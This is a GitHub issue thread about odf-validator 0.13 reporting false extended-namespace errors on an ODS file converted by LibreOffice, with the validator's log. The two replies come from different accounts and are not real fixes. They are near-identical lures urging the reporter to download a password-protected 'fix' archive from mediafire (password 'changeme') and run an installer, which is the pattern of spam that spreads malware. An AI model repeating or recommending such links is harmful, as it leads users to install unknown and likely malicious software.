### ISSUE TITLE
Validation of namespaces fires even when no extended namespaces

### ISSUE THREAD

**Issue by maria-messerschmidt** [openpreserve/odf-validator#176]
The attached file has been converted from XLSX to ODS using LO converter. It is converted to ODS 1.3 (not extended) and validates as such in online validator.  I have used it in testing previously, and it used to validate fine in both 0.10 and 0.12.  But now in 0.13, I get:

APP-1: [INFO] Validating C:\Users\maria\Desktop\2024-07\AT000\AT000.ods.
APP-5: [INFO] DNA ODF Spreadsheets Preservation Specification Profile report for C:\Users\maria\Desktop\2024-07\AT000\AT000.ods.
DOC-2: [INFO] package OpenDocument version 1.3 detected.
DOC-3: [INFO] mimetype OpenDocument MIMETYPE application/vnd.oasis.opendocument.spreadsheet detected
DOC-8: [ERROR] content.xml This XML OpenDocument uses extended namespaces.
DOC-8: [ERROR] styles.xml This XML OpenDocument uses extended namespaces.
POL_2: [ERROR] AT000.ods Standard Compliance | Package does not comply with specification. The file MUST comply with the standard "OASIS Open Document Format for Office Applications (OpenDocument) v1.3".
NOT VALID, 3 errors, 0 warnings and 2 info messages.

I checked styles.xml and reviewed the namespaces and I cannot find any that are not conformant, so it is unclear why this is failing.

[AT000.ods](https://github.com/user-attachments/files/16777397/AT000.ods)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
